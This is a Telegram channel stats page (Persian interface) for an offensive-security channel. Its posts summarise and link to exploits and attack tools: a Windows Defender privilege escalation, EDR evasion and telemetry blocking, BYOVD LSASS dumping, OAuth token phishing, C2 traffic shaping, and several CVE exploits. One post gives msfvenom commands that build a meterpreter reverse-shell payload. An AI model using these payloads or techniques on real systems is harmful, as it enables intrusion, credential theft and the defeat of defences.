اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
reconcore
رفتن به کانال در Telegram
#vulnerability #research #cve #rce #lpe #poc #tools #pentest #redteam #blueteam #offensivesecurity #technique #methods Educational use only. Content from public sources. Admin holds no liability for misuse. Users are solely responsible for their actions.
نمایش بیشتر2 158
مشترکین
+324 ساعت
+137 روز
+6030 روز
در حال بارگیری داده...
کانالهای مشابه
ابر برچسبها
اشارات ورودی و خروجی
---
---
---
---
---
---
جذب مشترکین
ژوئن '26
ژوئن '26
+25
در 0 کانالها
مه '26
+92
در 1 کانالها
Get PRO
آوریل '26
+89
در 2 کانالها
Get PRO
مارس '26
+116
در 1 کانالها
Get PRO
فوریه '26
+145
در 1 کانالها
Get PRO
ژانویه '26
+157
در 2 کانالها
Get PRO
دسامبر '25
+317
در 3 کانالها
Get PRO
نوامبر '25
+170
در 0 کانالها
Get PRO
اکتبر '25
+216
در 1 کانالها
Get PRO
سپتامبر '25
+125
در 2 کانالها
Get PRO
اوت '25
+118
در 5 کانالها
Get PRO
ژوئیه '25
+96
در 2 کانالها
Get PRO
ژوئن '25
+51
در 1 کانالها
Get PRO
مه '25
+68
در 3 کانالها
Get PRO
آوریل '25
+117
در 2 کانالها
Get PRO
مارس '25
+84
در 1 کانالها
Get PRO
فوریه '25
+108
در 1 کانالها
Get PRO
ژانویه '25
+73
در 2 کانالها
Get PRO
دسامبر '24
+4
در 0 کانالها
Get PRO
نوامبر '24
+127
در 0 کانالها
Get PRO
اکتبر '24
+38
در 0 کانالها
Get PRO
سپتامبر '24
+37
در 0 کانالها
Get PRO
اوت '24
+328
در 0 کانالها
Get PRO
ژوئیه '240
در 0 کانالها
Get PRO
ژوئن '24
+15
در 1 کانالها
| تاریخ | رشد مشترکین | اشارات | کانالها | |
| 10 ژوئن | +3 | |||
| 09 ژوئن | +3 | |||
| 08 ژوئن | +1 | |||
| 07 ژوئن | +4 | |||
| 06 ژوئن | +1 | |||
| 05 ژوئن | +1 | |||
| 04 ژوئن | +4 | |||
| 03 ژوئن | 0 | |||
| 02 ژوئن | +6 | |||
| 01 ژوئن | +2 |
پستهای کانال
RoguePlanet
Windows Defender LPE. The exploit is a race condition, so it's a hit or miss. I have managed to get a 100% success rate on some machines while it struggled to work on others. The exploit has been tested in Windows 11 (Official channel + Canary) and Windows 10 with june 2026 patch installed. The PoC however does not work in Windows Server since standard users cannot mount an ISO image, I'm confident that all Windows Server versions are vulnerable as well, you just need to redesign the exploit.#vulnerability #race_condition #lpe #poc @reconcore
| 2 | BOF Cocktails in Cobalt Strike: Instrumenting BOFs with BEACON_INLINE_EXECUTE and Crystal Palace
Original text: “BOF Cocktails in Cobalt Strike” — Rasta Mouse, rastamouse.me (05 Jun 2026). Code blocks and the screenshot below are reproduced verbatim from the source with attribution.
Post-exploitation Beacon Object Files (BOFs) historically inherited their evasion posture from whatever agent or loader executed them. If the loader took care of unhooking, masking,…
#redteam #bof @reconcore | 229 |
| 3 |  QuadRF lets you directly explore the RF environment around you. See where signals are, the way they propagate, and how antennas and the surrounding environment interact. At 30 fps, you can map WiFi devices in a room, quadcopters in the sky, or other wireless transmitters. Expanding beyond vision and LiDAR, your robots can use QuadRF to gain real-time spatial awareness of surrounding radio beacons and access points.
#rf #sdr @reconcore | 223 |
| 4 | DLL Hijacking Vulnerability Scanner
SearchAvailableExe is a comprehensive security research tool designed to identify and analyze DLL hijacking vulnerabilities in Windows executable files. This tool systematically scans signed executables to find potential DLL hijacking opportunities, making it valuable for security researchers, penetration testers, and system administrators.
#pe #re #dll #injection #analysis #binary #vulnerability #scanner #hijacking #security #research @reconcore | 216 |
| 5 |  FirewallXPL-Forge
Perimeter security exploitation framework — 164 modules covering FW, NGFW, UTM, WAF, VPN, NAC, LB, and OT/ICS firewalls (Fortinet, Cisco, Palo Alto, F5, Citrix, Check Point, SonicWall, Ivanti, Siemens, Moxa, +13 vendors). GPU-accelerated, ML-driven, async concurrency, Rich TUI.
#python #firewall #penetration_testing #pentest #ngfw #exploitation #framework #redteam #ics #security #vulnerability #scanner #waf #bypass #vpn #exploit #ot @reconcore | 238 |
| 6 | Shellcode-EDR-Evasion-Loader
shellcode loader with XOR encryption and EDR evasion techniques. for security research and authorized testing only.
payload:
msfvenom -p windows/x64/exec cmd=calc.exe -f raw -o payload.bin
reverse shell:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=_ LPORT=_ -f raw -o payload.bin
#shellcode #loader #windows #security #edr #evasion @reconcore | 271 |
| 7 |  c2detect
C2 server fingerprinter — Cobalt Strike, Sliver, Mythic, Havoc, Brute Ratel
cognis.digital #python #cli #automation #infosec #pentest #offensivesecurity #redteam @reconcore | 327 |
| 8 | EDRChoker
Client–server EDRs have an inherent weakness: they must maintain server connectivity to be effective. When isolated from their server they lose much of their capability, and administrators can no longer collect or monitor logs from those agents. EDRChoker uses policy-based Quality of Service (QoS) to throttle EDR agents to the lowest bandwidth; when agents attempt to connect they will consistently time out due to the extremely low bandwidth.
Blog: https://www.zerosalarium.com/2026/06/edrchoker-choking-telemetry-stream-block-edr.html
In this article I present a technique for interfering with the client–server connection of an EDR. It’s different from EDR connection-blocking methods that use the Windows Firewall or the Windows Filtering Platform (WFP). | 365 |
| 9 | CVE-2026-0826: Unauthenticated stack buffer overflow in HP Poly VVX and Trio VoIP Phones (RCE as root)
Vulnerable: VVX 150, VVX 250, VVX 350, and VVX 450), as well as Trio IP Conference series (Trio 8800, Trio 8500, and Trio 8300).
Blog: https://www.rapid7.com/blog/post/ve-cve-2026-0826-critical-unauthenticated-stack-buffer-overflow-hp-poly-vvx-trio-voip-phones-fixed/ | 367 |
| 10 | Hidden HTTP/2 Bomb
*
FOR nginx, Apache httpd, Microsoft IIS, Envoy, Cloudflare Pingora
*
WriteUP + LABs + PoCs | 516 |
| 11 | DarkReplica (CVE-2026-23631)
Redis Post-Auth RCE Exploit
The full technical writeup can be found here: https://www.zeroday.cloud/blog/redis-cve-2026-23631-dark-replica
#cve #redis #technique #rce @reconcore | 505 |
| 12 | One Click, One Hash: Unpatched NTLM Coercion in Windows Search URI Handler
Original text by Andrew Schwartz
Key Takeaways
Same bug class. No CVE. No fix. The NTLM coercion primitive in the Windows search: URI handler is technically identical to CVE-2026-33829 in the Snipping Tool. Same severity rating, same mechanism, same potential impact. Microsoft closed it without a CVE or a patch, describing its triage process as…
https://core-jmp.org/2026/06/one-click-one-hash-unpatched-ntlm-coercion-in-windows-search-uri-handler/ | 488 |
| 13 | ssh-keysign-pwn — CVE-2026-46333
A critical race condition flaw in pre-31e62c2ebbfd Linux kernels. Due to a window during process exit where the memory management structure is cleared before file descriptors are closed, an unprivileged user can use pidfd_getfd(2) to steal open file descriptors of privileged processes, enabling unauthorized reading of root-owned files.
🔗 Exploit:
https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn
🔗 Source:
https://blog.qualys.com/vulnerabilities-threat-research/2026/05/20/cve-2026-46333-local-root-privilege-escalation-and-credential-disclosure-in-the-linux-kernel-ptrace-path
#linux #kernel #privesc #racecondition #pidfd | 524 |
| 14 | CVE-2026-41089
Windows Netlogon Remote Code Execution via CLDAP Stack Buffer Overflow
CVSS 9.8 CRITICAL
#vulnerability #rce #cldap #poc @reconcore | 526 |
| 15 | MalGitApp
A simple OAuth App designed to capture OAuth tokens when users authenticate through GitHub OAuth flow.
The Phishy GitHub Issue Case
Developers have become a primary target for threat actors. The reason is simple and can be easily understood : they are the backbone of software you are using. They are the one publishing code that will execute on your machine when developing, in your CI/CD pipelines and on the servers in production. This type of attack is called “Supply Chain Attack”, where the attackers target the suppliers in order to compromise organizations or individuals. Basically, they compromise the third-parties to reach their main target (or hit at scale). Some of the recent examples of such attacks are involving Axios and LiteLLM with their 100M downloads per week each.
#phishing #oauth @reconcore | 601 |
| 16 | BYOVD and Looting LSASS in the Modern EDR Era
In today’s post, we will be uncovering the internals of kernel driver vulnerabilities and how to leverage them via the BYOVD (Bring Your Own Vulnerable Driver) method of attack. We will use kernel access to disable PPL for the LSASS process and then proceed to dump the process to disk, XOR’ing it beforehand so it avoids detection by popular EDR solutions.
https://github.com/g3tsyst3m/CodefromBlog/tree/main/2026-5-29-BYOVD%20and%20Looting%20LSASS%20in%20the%20Modern%20EDR%20Era | 523 |
| 17 |  EDR Tradecraft: Internals, Detection, Evasion & Advanced Research
Technical reference on modern EDR architecture, detection mechanisms, evasion techniques, and reverse-engineering methodology. Covers kernel callback APIs, file-system mini-filters, ETW providers, the four detection-engine model, syscall gates (FreshyCalls, RecycledGate, SysWhispers4, Acheron, Sysplant), sleep obfuscation (Ekko, FOLIAGE, DreamWalkers), call-stack spoofing (SilentMoonwalk, VulcanRaven), ETW-TI hardware-breakpoint bypass, patchless AMSI bypass via VEH, BYOVD against the vulnerable-driver blocklist, and the eight-phase EDR research methodology.
#research #technique #methods #re #evasion #edr @reconcore | 571 |
| 18 |  metasploit-framework Add Gogs rebase RCE exploit module
Adds an exploit module for an argument injection vulnerability in the pull request merge flow of Gogs (<= 0.14.2 and 0.15.0+dev).
The Merge() function in internal/database/pull.go passes the PR base branch name to git rebase without a -- separator. A branch named --exec=<CMD> is parsed by Git as the --exec flag rather than a positional argument, causing sh -c <CMD> to run after each replayed commit during the rebase.
Authenticated RCE via Argument Injection in Gogs
Rapid7 Labs discovered a critical argument injection (CWE-88) vulnerability in Gogs, a popular open-source self-hosted Git service. Rapid7 Labs scores this vulnerability as CVSSv4 9.4 (Critical).
#vulnerability #rce #metasploit #exploit @reconcore | 533 |
| 19 | metasploit-framework Add Gogs rebase RCE exploit module
Adds an exploit module for an argument injection vulnerability in the pull request merge flow of Gogs (<= 0.14.2 and 0.15.0+dev).
The Merge() function in internal/database/pull.go passes the PR base branch name to git rebase without a -- separator. A branch named --exec=<CMD> is parsed by Git as the --exec flag rather than a positional argument, causing sh -c <CMD> to run after each replayed commit during the rebase.
Authenticated RCE via Argument Injection in Gogs
Rapid7 Labs discovered a critical argument injection (CWE-88) vulnerability in Gogs, a popular open-source self-hosted Git service. Rapid7 Labs scores this vulnerability as CVSSv4 9.4 (Critical).
#vulnerabilities #rce #metasploit #exploit @reconcore | 6 |
| 20 | Echolalia is a Windows transport layer for Sliver.
It profiles outbound traffic from a legitimate process and shapes C2 beacons to follow the same packet-size and timing profile. | 474 |
